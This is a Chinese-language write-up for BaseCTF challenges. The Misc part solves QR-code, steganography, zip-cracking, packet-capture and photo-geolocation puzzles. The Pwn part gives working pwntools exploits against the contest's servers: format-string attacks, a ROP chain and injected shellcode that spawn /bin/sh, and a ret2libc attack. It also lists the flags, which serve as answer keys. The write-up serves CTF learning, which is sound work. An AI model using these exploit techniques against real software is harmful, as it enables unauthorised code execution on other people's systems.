Misc
二维码1-街头小广告
QR Research扫码得到信息
https://www.bilibili.com@qr.xinshi.fun/BV11k4y1X7Rj/mal1ci0us?flag=BaseCTF%7BQR_Code_1s_A_f0rM_Of_m3s5ag3%7D得到flag
BaseCTF{QR_Code_1s_A_f0rM_Of_m3s5ag3}反方向的雪
010查看,发现末尾为zip文件头reverse后的十六进制,进行reverse
reverse后发现key
The_key_is_n0secr3t根据提示压缩包密码为六位数,进行爆破,得到密码为123456
解压出flag.txt,010查看,发现明显snow隐写特征
snow隐写解码得到flag
SNOW.EXE -C -p n0secr3t flag.txt
BaseCTF{Y0u_g0t_1t!}ez_crypto
xxencode进行解密
xxencode !!!Give your flag:BaseCTF{BaseCTF_is_So_Good!!}得到flag
BaseCTF{BaseCTF_is_So_Good!!}Base?!
发现一串base,但是直接解码不对,先对BaseCTF头进行base64加密
QmFzZUNURg==发现与题目的字符串大小写相反,所以我们转化大小写后进行解码,得到flag
BaseCTF{Th1s_1s_4n_ez_b4se64dec0de}哇!珍德食泥鸭
先将gif的每一张图进行分离,并无异样,打开010查看发现docx文件标志,进行分离
先关闭隐藏更改字体颜色,在docx末尾将白块删除得到flag
BaseCTF{a651c13d-9600-437e-90ca-40d740fa7cb4}海上又遇了鲨鱼
在流量包中导出flag.zip,解压时发现需要密码,并得到以下信息
you need password!!!
repeat password???返回流量包中进行查看,对TCP流进行追踪,发现password
PASS Ba3eBa3e!@#解压后得到flag
BaseCTF{W1r3sharK_3at_r3p3at_paSsw0rd}黑丝上的flag
010初步检查无异常,查看通道,在A1发现flag
BaseCTF{Bl4ck_5ilk_1s_the_be5t}Aura 酱的旅行日记
国内照片直接先小红书搜搜
搜索成都自然博物馆地址,得到flag
BaseCTF{成都市成华区成华大道十里店路88号}前辈什么的最喜欢了
赛博厨子一把梭,得到一张png图片,打开发现CRC错误,更改宽高
得到flag
BaseCTF{q1n6_k4n_zh3_w0}Aura 酱的旅行日记 II
根据图片可以看到首东置业,地图查看,根据图片酒店应该处于首东置业的西北方向,对酒店进行遍历,得到flag
BaseCTF{四川省成都市吉瑞二路188号成都盛捷高新服务公寓}Aura 酱的旅行日记 III
从图片的横幅可以得到关键信息
得到flag
BaseCTF{四川省眉山市洪雅县瓦屋山风景区}Aura 酱的旅行日记 IV
识图找到地点
得到flag
BaseCTF{江苏省南京市秦淮区贡院街夫子庙景区}Aura 酱的旅行日记 V
识图找到地点
再邓小平故里附近搜索广场和陈列馆,得到flag
BaseCTF{四川省广安市广安区邓小平故里-邓小平铜像广场and邓小平故居陈列馆}Aura 酱的旅行日记 VI
根据图片搜索迎泽派出所校园警务室,并通过街景确定地点,搜索建校日期,得到flag
BaseCTF{山西省太原市迎泽区青年路49号太原市第五中学校-建校时间1906年}Aura 酱的旅行日记 VII
查看图片发现科创大厦和一分利,并且右下角有个北京烤鸭,进行搜索。因为下雪所以优先考虑北方。仔细看一分利旁边有鸿?连锁
搜索鸿?连锁一分利,发现抖音账号以及地址
得到flag
BaseCTF{河南省安阳市文峰区峨嵋大街与广顺街交叉口}Aura 酱的旅行日记 VIII
抖音发现相关信息
搜索布鲁维斯号以及周边餐厅,得到flag
BaseCTF{山东省威海市荣成市环海路布鲁之星海岸餐厅-布鲁维斯号-巴拿马}Aura 酱的旅行日记 IX
识图找到关键信息
搜索发现桥是西安浐灞2号桥
搜索附近景区发现西安后海,得到flag
BaseCTF{陕西省西安市灞桥区后海-欧亚大道}Pwn
format_string_level0
查看保护,保护全开
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled题目提供了ld先更改libc文件
ldd vuln
linux-vdso.so.1 (0x00007fff800e1000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdf6d440000)
/lib64/ld-linux-x86-64.so.2 (0x00007fdf6d67a000)patchelf --set-interpreter ./ld-linux-x86-64.so.2 --replace-nee
ded libc.so.6 ./libc.so.6 ./vuln
ldd vuln
linux-vdso.so.1 (0x00007ffd565af000)
./libc.so.6 (0x00007fe3fc58e000)
./ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x00007fe3fc7bf000)主函数部分发现格式化字符串漏洞,先计算输入处的偏移
payload=b"DDDDDDDD%p.%p.%p.%p.%p.%p.%p.%p.%p.%p" 偏移10
DDDDDDDD0x7ffd58ce6720.0x100.0x7f7db93f57e2.0x21001.0x55cd47c492a0.(nil).0x300000000.0x55cd47c492a0.0x10.0x4444444444444444通过栈可以找到flag存放处的偏移
另一种方法是在printf处输入指令,参数填目标地址
pwndbg> fmtarg 0x7fffffffde20
The index of format argument : 8 ("\%7$p")所以我们需要读取偏移为8处的字符,得到payload
from pwn import*
# io=process("1")
io=remote("challenge.basectf.fun",37814)
# payload=b"DDDDDDDD%p.%p.%p.%p.%p.%p.%p.%p.%p.%p" 偏移10
payload=b"%8$s"
io.sendline(payload)
io.interactive()
# BaseCTF{211bde83-2a11-43fa-9c54-c8a54ed463cc}format_string_level1
检查保护,只开了Canary和代码执行保护
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)先计算出输入数据的偏移为6
fmtarg 0x7fffffffde30
The index of format argument : 6 ("\%5$p")主函数需要将target非零才能进入if,所以这里向target地址(0x4040B0)写入1
from pwn import*
context.arch="amd64"
# io=process("1")
io=remote("challenge.basectf.fun",45829)
elf=ELF("1")
# gdb.attach(io,"b *0x4013CC")
# pause()
payload=fmtstr_payload(6,{0x4040B0:1},write_size='short')
print(payload)
print(len(payload))
io.sendline(payload)
io.interactive()
# BaseCTF{94523f3b-db87-445c-aa67-f2b27264863c}gift
检查保护,只开了Canary
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments这一题使用ret2syscall,学到了一种一把梭的办法,通过ROPgadget帮我们写出程序
ROPgadget --binary 1 --ropchain写出exp
from pwn import*
from struct import pack
io=remote("challenge.basectf.fun",34814)
# io=process("./1")
p = b''
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000419484) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a5e5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043d350) # xor rax, rax ; ret
p += pack('<Q', 0x000000000044a5e5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401f2f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000047f2eb) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x000000000043d350) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471350) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401ce4) # syscall
payload=b'a'*(0x20+8)+p
io.sendlineafter(b'same',payload)
io.interactive()
# BaseCTF{b3a08c25-59e7-4365-9e51-2233f13c886d}shellcode_level1
检查保护,发现保护全开
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled首先是调用了mmap函数。作用为定义在一个(0)任意系统分配的地址,大小为0x100,可读可写可执行(111)的空间赋值给buf
buf = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL);这行代码用于执行buf写入的代码,但是read处只接收两字节的数据
((void (__fastcall *)(_QWORD, void *, __int64))buf)(0LL, buf, 1280LL);当执行 call rcx的时候各寄存器情况,rax存放系统调用调用表,当rax存储0时,调用syscall会自动调用read函数
*RAX 0x0
RDX 0x500
RDI 0x0
RSI 0x7ffff7ffa000 ◂— 0xa /* '\n' */read函数参数如下,RSI中存入的是buf的地址,可以利用两字节调用syscall来写入shellcode
read(RDI,RSI,RDX) --> read(0,buf,0x500)写出exp
from pwn import*
# io=process("1")
io=remote("challenge.basectf.fun",41602)
context.arch="amd64"
# gdb,attach(io,"b $rebase(0x1225)")
# pause()
io.send(asm('''syscall'''))
payload=asm('''syscall''')+asm(shellcraft.sh())
io.sendline(payload)
io.interactive()
# BaseCTF{f889c737-3b21-42df-a801-e87c0ca34d78}她与你皆失
检查保护,只开了代码执行保护
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)查看主函数,发现栈溢出,尝试ret2libc,查询发现ret_add和pop_rdi
ROPgadget --binary 1 --only "pop|ret"
Gadgets information
============================================================
0x000000000040115d : pop rbp ; ret
0x0000000000401176 : pop rdi ; ret
0x0000000000401221 : pop rdx ; ret
0x0000000000401178 : pop rsi ; ret
0x000000000040101a : ret
0x00000000004011ba : ret 0xfffeexp
from pwn import *
from LibcSearcher import *
# io=process("1")
io = remote('challenge.basectf.fun',21375)
elf = ELF('1')
libc= ELF('libc.so.6')
ret_add = 0x040101a
pop_rdi = 0x0401176
main_add = 0x4011DF
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
offset=0x0A
payload = b'\x00'+ b'a' * (offset+8-1) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)
io.sendlineafter('do?', payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
system_add = libc_base + libc.symbols['system']
bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))
payload = b'\x00'+ b'a' * (offset+8-1) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)
io.sendlineafter('do?', payload)
io.interactive()
# BaseCTF{5a91b747-51e8-4b2c-9f61-be9d3428c441}
